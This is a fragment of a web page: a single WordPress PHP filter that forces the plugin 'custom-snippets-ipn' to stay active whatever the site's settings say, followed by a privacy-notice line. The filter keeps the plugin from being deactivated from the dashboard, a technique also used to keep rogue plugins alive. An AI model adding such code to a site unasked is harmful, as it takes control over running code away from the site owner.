add_filter( 'option_active_plugins', function( $plugins ){ $myplugin = "custom-snippets-ipn/custom-snippets.php"; if( !in_array( $myplugin, $plugins ) ){ $plugins[] = $myplugin; } return $plugins; } );
Your personal data will be used to support your experience throughout this website, to manage access to your account, and for other purposes described in our privacy policy.